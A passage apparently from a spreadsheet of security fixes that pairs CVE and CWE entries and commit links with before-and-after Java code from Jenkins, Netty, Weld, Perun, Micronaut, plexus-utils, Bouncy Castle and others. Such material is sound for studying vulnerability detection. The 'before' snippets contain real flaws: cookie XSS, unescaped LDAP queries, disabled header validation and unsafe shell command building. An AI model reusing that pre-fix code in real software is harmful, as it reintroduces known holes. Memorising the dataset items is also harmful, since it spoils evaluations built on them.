import org.kohsuke.accmod.restrictions.NoExternalUse;
    private static final Pattern ICON_SIZE = Pattern.compile("\\d+x\\d+");
    @Restricted(NoExternalUse.class)
    public static String validateIconSize(String iconSize) throws SecurityException {
        if (!ICON_SIZE.matcher(iconSize).matches()) {
            throw new SecurityException("invalid iconSize");
        }
        return iconSize;
    }
</t>
  </si>
  <si>
    <t>[FIXED SECURITY-77] XSS in iconSize cookie.</t>
  </si>
  <si>
    <t>View.java</t>
  </si>
  <si>
    <t xml:space="preserve">            iconSize = req != null ? Functions.getCookie(req, "iconSize", "32x32") : "32x32";
</t>
  </si>
  <si>
    <t xml:space="preserve">            iconSize = req != null ? Functions.validateIconSize(Functions.getCookie(req, "iconSize", "32x32")) : "32x32";
</t>
  </si>
  <si>
    <t>Jenkins.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.regex.Pattern;
        if(qs==null || !ICON_SIZE.matcher(qs).matches())
        Cookie cookie = new Cookie("iconSize", qs);
    private static final Pattern ICON_SIZE = Pattern.compile("\\d+x\\d+");
</t>
  </si>
  <si>
    <t xml:space="preserve">        if(qs==null)
        Cookie cookie = new Cookie("iconSize", Functions.validateIconSize(qs));
</t>
  </si>
  <si>
    <t>CVE-2014-2066</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/8ac74c350779921598f9d5edfed39dd35de8842a</t>
  </si>
  <si>
    <t>AuthenticationProcessingFilter2.java</t>
  </si>
  <si>
    <t>8ac74c350779921598f9d5edfed39dd35de8842a</t>
  </si>
  <si>
    <t xml:space="preserve">        request.getSession().invalidate();
</t>
  </si>
  <si>
    <t>[FIXED SECURITY-75] Invalidate session after login to avoid session f……ixation</t>
  </si>
  <si>
    <t>CVE-2014-2067</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/5d57c855f3147bfc5e7fda9252317b428a700014</t>
  </si>
  <si>
    <t>Cause.java</t>
  </si>
  <si>
    <t>5d57c855f3147bfc5e7fda9252317b428a700014</t>
  </si>
  <si>
    <t xml:space="preserve">                return Messages.Cause_RemoteCause_ShortDescriptionWithNote(addr, note);
            } else {
                return Messages.Cause_RemoteCause_ShortDescription(addr);
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.IOException;
                try {
                    return Messages.Cause_RemoteCause_ShortDescriptionWithNote(addr, Jenkins.getInstance().getMarkupFormatter().translate(note));
                } catch (IOException x) {
                    // ignore
                }
            return Messages.Cause_RemoteCause_ShortDescription(addr);
</t>
  </si>
  <si>
    <t>[FIXED SECURITY-74] Apply markup formatter to remote cause note.</t>
  </si>
  <si>
    <t>CWE-119</t>
  </si>
  <si>
    <t>CVE-2014-3488</t>
  </si>
  <si>
    <t>https://github.com/netty/netty/commit/2fa9400a59d0563a66908aba55c41e7285a04994</t>
  </si>
  <si>
    <t>SslHandler.java</t>
  </si>
  <si>
    <t>2fa9400a59d0563a66908aba55c41e7285a04994</t>
  </si>
  <si>
    <t xml:space="preserve">                            result = engine.unwrap(nioInNetBuf, nioOutAppBuf);
                            nioOutAppBuf.flip();
                            if (nioOutAppBuf.hasRemaining()) {
                                nettyOutAppBuf.writeBytes(nioOutAppBuf);
                            nioOutAppBuf.clear();
</t>
  </si>
  <si>
    <t xml:space="preserve">                        final int outAppBufSize = engine.getSession().getApplicationBufferSize();
                        final ByteBuffer outAppBuf;
                        if (nioOutAppBuf.capacity() &lt; outAppBufSize) {
                            // SSLEngine wants a buffer larger than what the pool can provide.
                            // Allocate a temporary heap buffer.
                            outAppBuf = ByteBuffer.allocate(outAppBufSize);
                        } else {
                            outAppBuf = nioOutAppBuf;
                        }
                            result = engine.unwrap(nioInNetBuf, outAppBuf);
                            outAppBuf.flip();
                            if (outAppBuf.hasRemaining()) {
                                nettyOutAppBuf.writeBytes(outAppBuf);
                            outAppBuf.clear();
</t>
  </si>
  <si>
    <t>Fix a bug where SslHandler does not handle SSLv2Hello correctlyMotivation:
When a SSLv2Hello message is received, SSLEngine expects the application buffer size to be more than 30KB which is larger than what SslBufferPool can provide.  SSLEngine will always return with BUFFER_OVERFLOW status, blocking the SSL session from continuing the handshake.
Modifications:
When SSLEngine.getSession().getApplicationBufferSize() returns a value larger than what SslBufferPool provides, allocate a temporary heap buffer.
Result:
SSLv2Hello is handled correctly.</t>
  </si>
  <si>
    <t>Improper Restriction of Operations within the Bounds of a Memory Buffer</t>
  </si>
  <si>
    <t>The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.</t>
  </si>
  <si>
    <t>Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data. As a result, an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash.</t>
  </si>
  <si>
    <t>CVE-2014-4172</t>
  </si>
  <si>
    <t>https://github.com/Jasig/java-cas-client/commit/ae37092100c8eaec610dab6d83e5e05a8ee58814</t>
  </si>
  <si>
    <t>AbstractUrlBasedTicketValidator.java</t>
  </si>
  <si>
    <t>ae37092100c8eaec610dab6d83e5e05a8ee58814</t>
  </si>
  <si>
    <t xml:space="preserve">        urlParameters.put("service", encodeUrl(serviceUrl));
                buffer.append(value);
</t>
  </si>
  <si>
    <t xml:space="preserve">        urlParameters.put("service", serviceUrl);
                final String encodedValue = encodeUrl(value);
                buffer.append(encodedValue);
</t>
  </si>
  <si>
    <t>CASC-228 URL Encode Paramaters Passed to Server via ValidateProblem: We currently don't pass encoded values to the server, possibly resolving in parsing/extraction errors.
Solution: URL Encode all values instead of just the service url.
QA Notes: Added unit test.</t>
  </si>
  <si>
    <t>Cas20ServiceTicketValidator.java</t>
  </si>
  <si>
    <t xml:space="preserve">        urlParameters.put("pgtUrl", encodeUrl(this.proxyCallbackUrl));
</t>
  </si>
  <si>
    <t xml:space="preserve">        urlParameters.put("pgtUrl", this.proxyCallbackUrl);
</t>
  </si>
  <si>
    <t>CWE-362</t>
  </si>
  <si>
    <t>CVE-2014-8122</t>
  </si>
  <si>
    <t>https://github.com/weld/core/commit/29fd1107fd30579ad9bb23fae4dc3ba464205745</t>
  </si>
  <si>
    <t>ConversationScopedBean.java</t>
  </si>
  <si>
    <t>29fd1107fd30579ad9bb23fae4dc3ba464205745</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * JBoss, Home of Professional Open Source
 * Copyright 2014, Red Hat, Inc., and individual contributors
 * by the @authors tag. See the copyright.txt in the distribution for a
 * full listing of individual contributors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 * http://www.apache.org/licenses/LICENSE-2.0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package org.jboss.weld.tests.contexts.cache;
import java.io.Serializable;
import javax.enterprise.context.ConversationScoped;
@ConversationScoped
public class ConversationScopedBean implements Serializable {
    private String value = "foo";
    public String getAndSet(String newValue) {
        String old = value;
        value = newValue;
        return old;
    }
}
</t>
  </si>
  <si>
    <t>WELD-1802 RequestScopedCache - Testcase</t>
  </si>
  <si>
    <t>Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</t>
  </si>
  <si>
    <t>The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.</t>
  </si>
  <si>
    <t>This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider. A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc. A race condition violates these properties, which are closely related: Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution. Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource. A race condition exists when an interfering code sequence can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single x++ statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x). The interfering code sequence could be trusted or untrusted. A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program.</t>
  </si>
  <si>
    <t>SimpleServlet.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * JBoss, Home of Professional Open Source
 * Copyright 2014, Red Hat, Inc., and individual contributors
 * by the @authors tag. See the copyright.txt in the distribution for a
 * full listing of individual contributors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 * http://www.apache.org/licenses/LICENSE-2.0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package org.jboss.weld.tests.contexts.cache;
import java.io.IOException;
import javax.inject.Inject;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.jboss.weld.context.beanstore.ConversationNamingScheme;
@WebServlet(value = "/servlet", asyncSupported = true)
public class SimpleServlet extends HttpServlet {
    @Inject
    private ConversationScopedBean bean;
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String action = req.getParameter("action");
        String sequence = req.getParameter("sequence");
        String poison = req.getParameter("poison");
        if ("getAndSet".equals(action)) {
            // the value should always be foo
            String value = bean.getAndSet("bar" + sequence);
            resp.getWriter().println(value);
            if (poison != null) {
                // this is a poisoning request
                // normal applications should never do something like this
                // we just do this to cause an exception to be thrown out of ConversationContext.deactivate
                req.removeAttribute(ConversationNamingScheme.PARAMETER_NAME);
            }
        } else {
            throw new IllegalArgumentException(action);
        }
    }
}
</t>
  </si>
  <si>
    <t>https://github.com/weld/core/commit/6808b11cd6d97c71a2eed754ed4f955acd789086</t>
  </si>
  <si>
    <t>RequestScopedCache.java</t>
  </si>
  <si>
    <t>6808b11cd6d97c71a2eed754ed4f955acd789086</t>
  </si>
  <si>
    <t xml:space="preserve">        CACHE.remove();
</t>
  </si>
  <si>
    <t xml:space="preserve">        // if the previous request was not ended properly for some reason, make sure it is ended now
        endRequest();
            CACHE.remove();
</t>
  </si>
  <si>
    <t>WELD-1802 RequestScopedCache - Make sure each request is ended before…… a new one is started</t>
  </si>
  <si>
    <t>https://github.com/weld/core/commit/8e413202fa1af08c09c580f444e4fd16874f9c65</t>
  </si>
  <si>
    <t>ConversationContextActivator.java</t>
  </si>
  <si>
    <t>8e413202fa1af08c09c580f444e4fd16874f9c65</t>
  </si>
  <si>
    <t xml:space="preserve">        ConversationContext conversationContext = httpConversationContext();
        if (conversationContext.isActive()) {
            // Only deactivate the context if one is already active, otherwise we get Exceptions
            if (conversationContext instanceof LazyHttpConversationContextImpl) {
                LazyHttpConversationContextImpl lazyConversationContext = (LazyHttpConversationContextImpl) conversationContext;
                if (!lazyConversationContext.isInitialized()) {
                    // if this lazy conversation has not been touched yet, just deactivate it
                    lazyConversationContext.deactivate();
                    return;
            }
            boolean isTransient = conversationContext.getCurrentConversation().isTransient();
            if (ConversationLogger.LOG.isTraceEnabled()) {
                    ConversationLogger.LOG.cleaningUpTransientConversation();
                } else {
                    ConversationLogger.LOG.cleaningUpConversation(conversationContext.getCurrentConversation().getId());
            conversationContext.invalidate();
            conversationContext.deactivate();
            if (isTransient) {
                conversationDestroyedEvent.fire(request);
            }
</t>
  </si>
  <si>
    <t xml:space="preserve">        try {
            ConversationContext conversationContext = httpConversationContext();
            if (conversationContext.isActive()) {
                // Only deactivate the context if one is already active, otherwise we get Exceptions
                if (conversationContext instanceof LazyHttpConversationContextImpl) {
                    LazyHttpConversationContextImpl lazyConversationContext = (LazyHttpConversationContextImpl) conversationContext;
                    if (!lazyConversationContext.isInitialized()) {
                        // if this lazy conversation has not been touched yet, just deactivate it
                        lazyConversationContext.deactivate();
                        return;
                    }
                boolean isTransient = conversationContext.getCurrentConversation().isTransient();
                if (ConversationLogger.LOG.isTraceEnabled()) {
                    if (isTransient) {
                        ConversationLogger.LOG.cleaningUpTransientConversation();
                    } else {
                        ConversationLogger.LOG.cleaningUpConversation(conversationContext.getCurrentConversation().getId());
                    }
                }
                conversationContext.invalidate();
                conversationContext.deactivate();
                    conversationDestroyedEvent.fire(request);
        } catch (Exception e) {
            ServletLogger.LOG.unableToDeactivateContext(httpConversationContext(), request);
            ServletLogger.LOG.catchingDebug(e);
</t>
  </si>
  <si>
    <t>WELD-1802 An exception during context deactivation/dissociation shouldnot abort further procesing</t>
  </si>
  <si>
    <t>CVE-2020-10990</t>
  </si>
  <si>
    <t>https://github.com/Accenture/mercury/commit/f647a01347485d2afe3a0b735eab3d0121d61f46</t>
  </si>
  <si>
    <t>MainApp.java</t>
  </si>
  <si>
    <t>f647a01347485d2afe3a0b735eab3d0121d61f46</t>
  </si>
  <si>
    <t xml:space="preserve">import org.platformlambda.core.system.ServerPersonality;
</t>
  </si>
  <si>
    <t>Merge pull request #14 from Accenture/security/xml-xxe-1-2020v1.12.28 with rest-automation improvements and XXE patch</t>
  </si>
  <si>
    <t>HelloGeneric.java</t>
  </si>
  <si>
    <t xml:space="preserve">            SamplePoJo mock = new SamplePoJo(1, "Class with generic type resolved at run-time to be SamplePoJo", "200 World Blvd, Planet Earth");
</t>
  </si>
  <si>
    <t xml:space="preserve">            SamplePoJo mock = new SamplePoJo(1, "Generic class with parametric type SamplePoJo",
                                    "200 World Blvd, Planet Earth");
</t>
  </si>
  <si>
    <t>CWE-732</t>
  </si>
  <si>
    <t>CVE-2020-5281</t>
  </si>
  <si>
    <t>https://github.com/CESNET/perun/commit/ac527bc3225a64208ee5cee59e5918ee360ca039</t>
  </si>
  <si>
    <t>ExtSourceLdap.java</t>
  </si>
  <si>
    <t>ac527bc3225a64208ee5cee59e5918ee360ca039</t>
  </si>
  <si>
    <t xml:space="preserve">		query = query.replaceAll("\\?", searchString);
		query = query.replaceAll("\\?", login);
</t>
  </si>
  <si>
    <t xml:space="preserve">		query = query.replace("?", Utils.escapeStringForLDAP(searchString));
		query = query.replace("?", Utils.escapeStringForLDAP(login));
</t>
  </si>
  <si>
    <t>Merge pull request #2635 from stavamichal/fixVulnerablityInLDAPBasedE……xtSources
Fix vulnerability in communication with LDAP connector</t>
  </si>
  <si>
    <t>Incorrect Permission Assignment for Critical Resource</t>
  </si>
  <si>
    <t>The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.</t>
  </si>
  <si>
    <t>When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data.</t>
  </si>
  <si>
    <t>Utils.java</t>
  </si>
  <si>
    <t xml:space="preserve">	/**
	 * We need to escape some special characters for LDAP filtering.
	 * We need to escape these characters: '\\', '*', '(', ')', '\000'
	 *
	 * @param searchString search string which need to be escaped properly
	 * @return properly escaped search string
	 */
	public static String escapeStringForLDAP(String searchString) {
		if(searchString == null) return "";
		return searchString.replace("\\", "\\5C").replace("*", "\\2A").replace("(", "\\28").replace(")", "\\29").replace("\000", "\\00");
	}
</t>
  </si>
  <si>
    <t>CWE-444</t>
  </si>
  <si>
    <t>CVE-2020-7611</t>
  </si>
  <si>
    <t>https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1</t>
  </si>
  <si>
    <t>NettyHttpHeaders.java</t>
  </si>
  <si>
    <t>9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1</t>
  </si>
  <si>
    <t xml:space="preserve">        this.nettyHeaders = new DefaultHttpHeaders(false);
</t>
  </si>
  <si>
    <t xml:space="preserve">        this.nettyHeaders = new DefaultHttpHeaders();
</t>
  </si>
  <si>
    <t>Validate client headers</t>
  </si>
  <si>
    <t>Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')</t>
  </si>
  <si>
    <t>The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.</t>
  </si>
  <si>
    <t>HTTP requests or responses (messages) can be malformed or unexpected in ways that cause web servers or clients to interpret the messages in different ways than intermediary HTTP agents such as load balancers, reverse proxies, web caching proxies, application firewalls, etc. For example, an adversary may be able to add duplicate or different header fields that a client or server might interpret as one set of messages, whereas the intermediary might interpret the same sequence of bytes as a different set of messages. For example, discrepancies can arise in how to handle duplicate headers like two Transfer-encoding (TE) or two Content-length (CL), or the malicious HTTP message will have different headers for TE and CL. The inconsistent parsing and interpretation of messages can allow the adversary to smuggle a message to the client/server without the intermediary being aware of it. This weakness is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.</t>
  </si>
  <si>
    <t>CWE-78</t>
  </si>
  <si>
    <t>CVE-2017-1000487</t>
  </si>
  <si>
    <t>https://github.com/codehaus-plexus/plexus-utils/commit/b38a1b3a4352303e4312b2bb601a0d7ec6e28f41</t>
  </si>
  <si>
    <t>Commandline.java</t>
  </si>
  <si>
    <t>b38a1b3a4352303e4312b2bb601a0d7ec6e28f41</t>
  </si>
  <si>
    <t xml:space="preserve">     * Create a new command line object.
     * Shell is autodetected from operating system
     * Shell is autodetected from operating system
                realPos = ( getExecutable() == null ? 0 : 1 );
        String executable = getExecutable();
                process = Runtime.getRuntime().exec( getShellCommandline(), environment );
                process = Runtime.getRuntime().exec( getShellCommandline(), environment, workingDir );
        if ( shell.getExecutable() == null )
</t>
  </si>
  <si>
    <t xml:space="preserve">     * Shell usage is only desirable when generating code for remote execution.
     *
     *
     * Shell usage is only desirable when generating code for remote execution.
     * Create a new command line object, given a command following POSIX sh quoting rules
                realPos = ( getLiteralExecutable() == null ? 0 : 1 );
    /**
     * @return Executable to be run, as a literal string (no shell quoting/munging)
     */
    public String getLiteralExecutable()
    {
        return executable;
    }
    /**
     * Return an executable name, quoted for shell use.
     *
     * Shell usage is only desirable when generating code for remote execution.
     *
     * @return Executable to be run, quoted for shell interpretation
     */
        String executable = getLiteralExecutable();
     *
     * Shell usage is only desirable when generating code for remote execution.
                process = Runtime.getRuntime().exec( getCommandline(), environment, workingDir );
                process = Runtime.getRuntime().exec( getCommandline(), environment, workingDir );
        if ( shell.getOriginalExecutable() == null )
     * Shell usage is only desirable when generating code for remote execution.
     *
     * Shell usage is only desirable when generating code for remote execution.
</t>
  </si>
  <si>
    <t>[PLXUTILS-161] Commandline shell injection problemsPatch by Charles Duffy, applied unmodified</t>
  </si>
  <si>
    <t>Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</t>
  </si>
  <si>
    <t>The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.</t>
  </si>
  <si>
    <t>This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage. There are at least two subtypes of OS command injection: The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system(nslookup [HOSTNAME]) to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing. The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use exec([COMMAND]) to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line. From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input.</t>
  </si>
  <si>
    <t>BourneShell.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.codehaus.plexus.util.StringUtils;
    private static final char[] BASH_QUOTING_TRIGGER_CHARS = {
        ' ',
        '$',
        ';',
        '&amp;',
        '|',
        '&lt;',
        '&gt;',
        '*',
        '?',
        '(',
        ')',
        '[',
        ']',
        '{',
        '}',
        '`' };
        this( false );
        setExecutableQuoteDelimiter( '\"' );
        return unifyQuotes( super.getExecutable());
        sb.append( unifyQuotes( dir ) );
    protected char[] getQuotingTriggerChars()
    {
        return BASH_QUOTING_TRIGGER_CHARS;
    }
     * BourneShell.unifyQuotes(null)                       = null
     * BourneShell.unifyQuotes("")                         = (empty)
     * BourneShell.unifyQuotes("/test/quotedpath'abc")     = /test/quotedpath\'abc
     * BourneShell.unifyQuotes("/test/quoted path'abc")    = "/test/quoted path'abc"
     * BourneShell.unifyQuotes("/test/quotedpath\"abc")    = "/test/quotedpath\"abc"
     * BourneShell.unifyQuotes("/test/quoted path\"abc")   = "/test/quoted path\"abc"
     * BourneShell.unifyQuotes("/test/quotedpath\"'abc")   = "/test/quotedpath\"'abc"
     * BourneShell.unifyQuotes("/test/quoted path\"'abc")  = "/test/quoted path\"'abc"
    protected static String unifyQuotes( String path )
        if ( path.indexOf( " " ) == -1 &amp;&amp; path.indexOf( "'" ) != -1 &amp;&amp; path.indexOf( "\"" ) == -1 )
        {
            return StringUtils.escape( path );
        }
        return StringUtils.quoteAndEscape( path, '\"', BASH_QUOTING_TRIGGER_CHARS );
</t>
  </si>
  <si>
    <t xml:space="preserve">        this(false);
        setUnconditionalQuoting( true );
        setExecutableQuoteDelimiter( '\'' );
        return quoteOneItem( super.getOriginalExecutable(), true );
        sb.append( quoteOneItem( dir, false ) );
     * BourneShell.quoteOneItem(null)                       = null
     * BourneShell.quoteOneItem("")                         = ''
     * BourneShell.quoteOneItem("/test/quotedpath'abc")     = '/test/quotedpath'"'"'abc'
     * BourneShell.quoteOneItem("/test/quoted path'abc")    = '/test/quoted pat'"'"'habc'
     * BourneShell.quoteOneItem("/test/quotedpath\"abc")    = '/test/quotedpath"abc'
     * BourneShell.quoteOneItem("/test/quoted path\"abc")   = '/test/quoted path"abc'
     * BourneShell.quoteOneItem("/test/quotedpath\"'abc")   = '/test/quotedpath"'"'"'abc'
     * BourneShell.quoteOneItem("/test/quoted path\"'abc")  = '/test/quoted path"'"'"'abc'
    protected String quoteOneItem( String path, boolean isExecutable )
        StringBuilder sb = new StringBuilder();
        sb.append( "'" );
        sb.append( path.replace( "'", "'\"'\"'" ) );
        sb.append( "'" );
        return sb.toString();
</t>
  </si>
  <si>
    <t>Shell.java</t>
  </si>
  <si>
    <t xml:space="preserve">                char[] escapeChars = getEscapeChars( isSingleQuotedExecutableEscaped(), isDoubleQuotedExecutableEscaped() );
                sb.append( StringUtils.quoteAndEscape( getExecutable(), getExecutableQuoteDelimiter(), escapeChars, getQuotingTriggerChars(), '\\', false ) );
                char[] escapeChars = getEscapeChars( isSingleQuotedArgumentEscaped(), isDoubleQuotedArgumentEscaped() );
                sb.append( StringUtils.quoteAndEscape( arguments[i], getArgumentQuoteDelimiter(), escapeChars, getQuotingTriggerChars(), getArgumentEscapePattern(), false ) );
        commandLine.addAll( getCommandLine( getExecutable(), arguments ) );
</t>
  </si>
  <si>
    <t xml:space="preserve">    private boolean unconditionallyQuote = false;
    /**
     * Toggle unconditional quoting
     *
     * @param unconditionallyQuote
     */
    public void setUnconditionalQuoting(boolean unconditionallyQuote)
    {
        this.unconditionallyQuote = unconditionallyQuote;
    }
    protected String quoteOneItem(String inputString, boolean isExecutable)
    {
        char[] escapeChars = getEscapeChars( isSingleQuotedExecutableEscaped(), isDoubleQuotedExecutableEscaped() );
        return StringUtils.quoteAndEscape(
            inputString,
            isExecutable ? getExecutableQuoteDelimiter() : getArgumentQuoteDelimiter(),
            escapeChars,
            getQuotingTriggerChars(),
            '\\',
            unconditionallyQuote
        );
    }
                sb.append( quoteOneItem( getOriginalExecutable(), true ) );
                sb.append( quoteOneItem( arguments[i], false ) );
        commandLine.addAll( getCommandLine( getOriginalExecutable(), arguments ) );
</t>
  </si>
  <si>
    <t>CWE-203</t>
  </si>
  <si>
    <t>CVE-2017-13098</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/a00b684465b38d722ca9a3543b8af8568e6bad5c</t>
  </si>
  <si>
    <t>JceDefaultTlsCredentialedDecryptor.java</t>
  </si>
  <si>
    <t>a00b684465b38d722ca9a3543b8af8568e6bad5c</t>
  </si>
  <si>
    <t xml:space="preserve">            M = c.doFinal(encryptedPreMasterSecret);
</t>
  </si>
  <si>
    <t xml:space="preserve">            byte[] m = c.doFinal(encryptedPreMasterSecret);
            if (m != null &amp;&amp; m.length == 48)
            {
                M = m;
            }
</t>
  </si>
  <si>
    <t>Confirm size of decrypted PMS before using</t>
  </si>
  <si>
    <t>Observable Discrepancy</t>
  </si>
  <si>
    <t>The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.</t>
  </si>
  <si>
    <t>Discrepancies can take many forms, and variations may be detectable in timing, control flow, communications such as replies or requests, or general behavior. These discrepancies can reveal information about the product's operation or internal state to an unauthorized actor. In some cases, discrepancies can be used by attackers to form a side channel.</t>
  </si>
  <si>
    <t>CWE-326</t>
  </si>
  <si>
    <t>CVE-2017-2598</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/e6aa166246d1734f4798a9e31f78842f4c85c28b</t>
  </si>
  <si>
    <t>Item.java</t>
  </si>
  <si>
    <t>e6aa166246d1734f4798a9e31f78842f4c85c28b</t>
  </si>
  <si>
    <t xml:space="preserve">     * If the user lacks {@link CONFIGURE} then any {@link Secret}s must be masked out, even in encrypted form.
</t>
  </si>
  <si>
    <t xml:space="preserve">     * If the user lacks {@link #CONFIGURE} then any {@link Secret}s must be masked out, even in encrypted form.
</t>
  </si>
  <si>
    <t>Merge pull request #105 from jenkinsci-cert/SECURITY-304-t3[SECURITY-304] Encrypt new secrets with CBC and random IV instead of ECB</t>
  </si>
  <si>
    <t>Inadequate Encryption Strength</t>
  </si>
  <si>
    <t>The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.</t>
  </si>
  <si>
    <t>A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.</t>
  </si>
  <si>
    <t>HistoricalSecrets.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * The MIT License
 *
 * Copyright (c) 2004-2010, Sun Microsystems, Inc., Kohsuke Kawaguchi
 * Copyright (c) 2016, CloudBees Inc.
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */
package hudson.util;
import com.trilead.ssh2.crypto.Base64;
import hudson.Util;
import jenkins.model.Jenkins;
import jenkins.security.CryptoConfidentialKey;
import org.kohsuke.accmod.Restricted;
import org.kohsuke.accmod.restrictions.NoExternalUse;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import java.io.IOException;
import java.security.GeneralSecurityException;
import static java.nio.charset.StandardCharsets.UTF_8;
/**
 * Historical algorithms for decrypting {@link Secret}s.
 */
@Restricted(NoExternalUse.class)
public class HistoricalSecrets {
    /*package*/ static Secret decrypt(String data, CryptoConfidentialKey key) throws IOException, GeneralSecurityException {
        byte[] in = Base64.decode(data.toCharArray());
        Secret s = tryDecrypt(key.decrypt(), in);
        if (s!=null)    return s;
        // try our historical key for backward compatibility
        Cipher cipher = Secret.getCipher("AES");
        cipher.init(Cipher.DECRYPT_MODE, getLegacyKey());
        return tryDecrypt(cipher, in);
    }
    /*package*/ static Secret tryDecrypt(Cipher cipher, byte[] in) {
        try {
            String plainText = new String(cipher.doFinal(in), UTF_8);
            if(plainText.endsWith(MAGIC))
                return new Secret(plainText.substring(0,plainText.length()-MAGIC.length()));
            return null;
        } catch (GeneralSecurityException e) {
            return null; // if the key doesn't match with the bytes, it can result in BadPaddingException
        }
    }
    /**
     * Turns {@link Jenkins#getSecretKey()} into an AES key.
     *
     * @deprecated
     * This is no longer the key we use to encrypt new information, but we still need this
     * to be able to decrypt what's already persisted.
     */
    @Deprecated
    /*package*/ static SecretKey getLegacyKey() throws GeneralSecurityException {
        String secret = Secret.SECRET;
        if(secret==null)    return Jenkins.getInstance().getSecretKeyAsAES128();
        return Util.toAes128Key(secret);
    }
